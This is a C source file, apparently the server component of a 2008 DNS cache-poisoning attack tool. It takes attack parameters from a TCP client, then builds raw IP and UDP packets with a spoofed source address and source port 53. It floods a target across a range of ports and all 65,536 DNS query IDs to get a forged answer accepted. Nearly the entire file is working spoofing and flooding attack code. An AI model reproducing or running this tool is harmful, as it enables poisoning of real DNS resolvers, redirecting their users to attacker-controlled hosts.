/*
 * 2008+ Copyright (c) Evgeniy Polyakov <johnpol@2ka.mipt.ru>
 * All rights reserved.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>

#include <fcntl.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <poll.h>
#include <time.h>

#include <netinet/in.h>
#include <arpa/inet.h>

#include <netinet/udp.h>
#include <netinet/ip.h>

#include "query.h"
#include "attack.h"

static char default_server_addr[] = "0.0.0.0";
static char default_server_port[] = "1025";

static int server_init_socket(char *addr, char *port, int type, int proto)
{
	int s, err;
	struct addrinfo *ai, hint;

	s = socket(AF_INET, type, proto);
	if (s < 0) {
		ulog_err("Failed to create a socket");
		return -1;
	}

	memset(&hint, 0, sizeof(struct addrinfo));

	hint.ai_flags = AI_NUMERICSERV;
	hint.ai_family = AF_INET;
	hint.ai_socktype = type;
	hint.ai_protocol = proto;

	err = getaddrinfo(addr, port, &hint, &ai);
	if (err) {
		ulog_err("Failed to get address info for %s:%s, err: %s [%d]", addr, port, gai_strerror(err), err);
		goto err_out_close;
	}

	err = bind(s, ai->ai_addr, ai->ai_addrlen);
	if (err) {
		ulog_err("Failed to bind to %s:%s", addr, port);
		goto err_out_free;
	}

	if (proto == IPPROTO_TCP) {
		err = listen(s, 100);
		if (err) {
			ulog_err("Failed to listen at %s:%s", addr, port);
			goto err_out_free;
		}
	}

	freeaddrinfo(ai);

	return s;

err_out_free:
	freeaddrinfo(ai);
err_out_close:
	close(s);
	return -1;

}

static void server_usage(char *p)
{
	uloga("Usage: %s <options>\n", p);
	uloga("	-a addr			- server listen address. Default: %s.\n", default_server_addr);
	uloga("	-p port			- server listen port. Default: %s.\n", default_server_port);
	uloga("	-e hwaddr		- outgoing interface HW addr. Default: broadcast.\n");
	uloga("	-h			- this help.\n");
}

static __u16 in_cksum(const __u16 *addr, register unsigned int len, int csum)
{
	int nleft = len;
	const __u16 *w = addr;
	__u16 answer;
	int sum = csum;

	/*
	 *  Our algorithm is simple, using a 32 bit accumulator (sum),
	 *  we add sequential 16 bit words to it, and at the end, fold
	 *  back all the carry bits from the top 16 bits into the lower
	 *  16 bits.
	 */
	while (nleft > 1)  {
		sum += *w++;
		nleft -= 2;
	}
	if (nleft == 1)
		sum += htons(*(unsigned char *)w<<8);

	/*
	 * add back carry outs from top 16 bits to low 16 bits
	 */
	sum = (sum >> 16) + (sum & 0xffff);	/* add hi 16 to low 16 */
	sum += (sum >> 16);			/* add carry */
	answer = ~sum;				/* truncate to 16 bits */
	return (answer);
}


static int udp_cksum(__u32 daddr, __u32 saddr,
		     register const struct udphdr *up,
		     register unsigned int len)
{
	union phu {
		struct phdr {
			__u32 src;
			__u32 dst;
			__u8 mbz;
			__u8 proto;
			__u16 len;
		} ph;
		__u16 pa[6];
	} phu;
	register const __u16 *sp;

	/* pseudo-header.. */
	phu.ph.len = htons((__u16)len);
	phu.ph.mbz = 0;
	phu.ph.proto = IPPROTO_UDP;
	phu.ph.src = saddr;
	phu.ph.dst = daddr;

	sp = &phu.pa[0];
	return in_cksum((__u16 *)up, len,
			sp[0]+sp[1]+sp[2]+sp[3]+sp[4]+sp[5]);
}

static void server_setup_udp_header(void *hdr,
		__u32 daddr, __u16 dport,
		__u32 saddr, __u16 sport,
		int size)
{
	struct udphdr *udp = hdr;

	udp->source	= htons(sport);
	udp->dest	= htons(dport);
	udp->len	= htons(sizeof(struct udphdr) + size);
	udp->check	= 0;
	udp->check	= udp_cksum(daddr, saddr, udp, sizeof(struct udphdr) + size);
}

static int server_has_new_task(int s, int timeout)
{
	struct pollfd pfd;
	int num;

	pfd.fd = s;
	pfd.events = POLLIN | POLLERR | POLLHUP;
	pfd.revents = 0;

	num = poll(&pfd, 1, timeout);
	if (num < 0) {
		ulog_err("Failed to poll");
		return -1;
	}

	if (num == 0)
		return 0;

	if (pfd.revents & (POLLERR | POLLHUP))
		return -1;

	return (pfd.revents & POLLIN);
}

static void server_setup_ip_header(void *hdr, __u32 daddr, __u32 saddr, __u16 size)
{
	struct iphdr *ip = hdr;

	ip->ihl 	= 5;
	ip->version 	= 4;
	ip->tos		= 0;
	ip->tot_len	= htons(sizeof(struct iphdr) + sizeof(struct udphdr) + size);
	ip->id		= 0;
	ip->frag_off	= 0;
	ip->ttl		= 64;
	ip->protocol	= IPPROTO_UDP;
	ip->check	= 0;
	ip->saddr	= saddr;
	ip->daddr	= daddr;

	ip->check 	= (in_cksum((__u16 *)ip, ip->ihl*4, 0));
}

static int attack_server(int cs, int as)
{
	int err, pmin, pmax, dport, sport, size, id;
	struct attack_data a;
	char buf[16*1024];
	struct sockaddr_in sa;
	void *data;
	struct query_header *h;
	int packets;
	struct timeval tv1, tv2;

	memset(buf, 0, sizeof(buf));

	size = sizeof(struct attack_data);
	data = &a;
	while (size) {
		err = recv(cs, data, size, 0);
		if (err <= 0) {
			ulog_err("Failed to read header from client");
			return -1;
		}

		data += err;
		size -= err;
	}

	sport = 53;
	pmin = ntohs(a.pmin);
	pmax = ntohs(a.pmax);
	size = ntohl(a.size);

	h = data = buf + sizeof(struct udphdr) + sizeof(struct iphdr);

	while (size) {
		err = recv(cs, data, size, 0);
		if (err <= 0) {
			ulog_err("Failed to read data from client: err: %d", err);
			return -1;
		}

		size -= err;
		data += err;
	}

	data = h;
	size = ntohl(a.size);

	sa.sin_addr.s_addr = a.daddr;
	sa.sin_port = 0;
	sa.sin_family = AF_INET;

	packets = 0;
	gettimeofday(&tv1, NULL);

	server_setup_ip_header(buf, a.daddr, a.saddr, size);

	for (dport=pmin; dport<=pmax; ++dport) {
		for (id=0; id<=0xffff; ++id) {
			err = 0;
			if (server_has_new_task(cs, 0))
				goto out;

			h->id = htons(id);
			server_setup_udp_header(buf + sizeof(struct iphdr), a.daddr, dport, a.saddr, sport, size);

			err = sendto(as, buf, size + sizeof(struct udphdr) + sizeof(struct iphdr), 0,
					(struct sockaddr *)&sa, sizeof(struct sockaddr_in));
			usleep(1);
			if (err <= 0 && errno == EAGAIN)
				continue;
			if (err <= 0) {
				char saddr_str[32];
				char daddr_str[32];
				struct in_addr ia;

				ia.s_addr = a.saddr;
				snprintf(saddr_str, sizeof(saddr_str), "%s", inet_ntoa(ia));

				ia.s_addr = a.daddr;
				snprintf(daddr_str, sizeof(daddr_str), "%s", inet_ntoa(ia));

				ulog_err("Failed to send data (id: %04x) to %s:%d -> %s:%d",
						id,
						saddr_str, sport,
						daddr_str, dport);
				goto out;
			}

			packets++;
		}
	}

out:
	gettimeofday(&tv2, NULL);

	{
		double t = (tv2.tv_sec - tv1.tv_sec)*1000000.0 + (tv2.tv_usec - tv1.tv_usec);
		double pps = 0;
		
		t /= 1000000.0;
		if (t > 0.001)
			pps = (double)packets/t;

		ulog("%s: dport: %d [%d-%d], id: %04x, packets: %d, t: %.1f sec, speed: %.1f pps.\n",
			__func__, dport, pmin, pmax, id, packets, t, pps);
	}

	return err;
}

int main(int argc, char *argv[])
{
	int ch, s, err, as;
	char *addr, *port;

	addr = default_server_addr;
	port = default_server_port;

	err = 0;
	while ((ch = getopt(argc, argv, "a:p:h")) != -1) {
		switch (ch) {
			case 'a':
				addr = optarg;
				break;
			case 'p':
				port = optarg;
				break;
			default:
				server_usage(argv[0]);
				return -1;
		}
	}

	s = server_init_socket(addr, port, SOCK_STREAM, IPPROTO_TCP);
	if (s < 0)
		return -1;
	
	as = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
	if (as < 0) {
		ulog_err("Failed to create a socket");
		return -1;
	}

	//fcntl(as, F_SETFL, O_NONBLOCK);
#if 0
	ch = 1024*1024*1024;
	setsockopt(as, SOL_SOCKET, SO_SNDBUF, &ch, 4);
#endif
	while (1) {
		int cs;
		unsigned int salen;
		struct sockaddr_in sa;

		salen = sizeof(struct sockaddr_in);
		cs = accept(s, (struct sockaddr *)&sa, &salen);
		if (cs < 0) {
			ulog_err("Failed to accept new client");
			return -1;
		}

		ulog("Accepted client %s:%d.\n", inet_ntoa(sa.sin_addr), ntohs(sa.sin_port));

		while (1) {
			err = server_has_new_task(cs, 1000);
			if (err < 0)
				break;
			if (!err)
				continue;

			err = attack_server(cs, as);
			if (err < 0)
				break;
		}

		close(cs);
	}

	return 0;
}


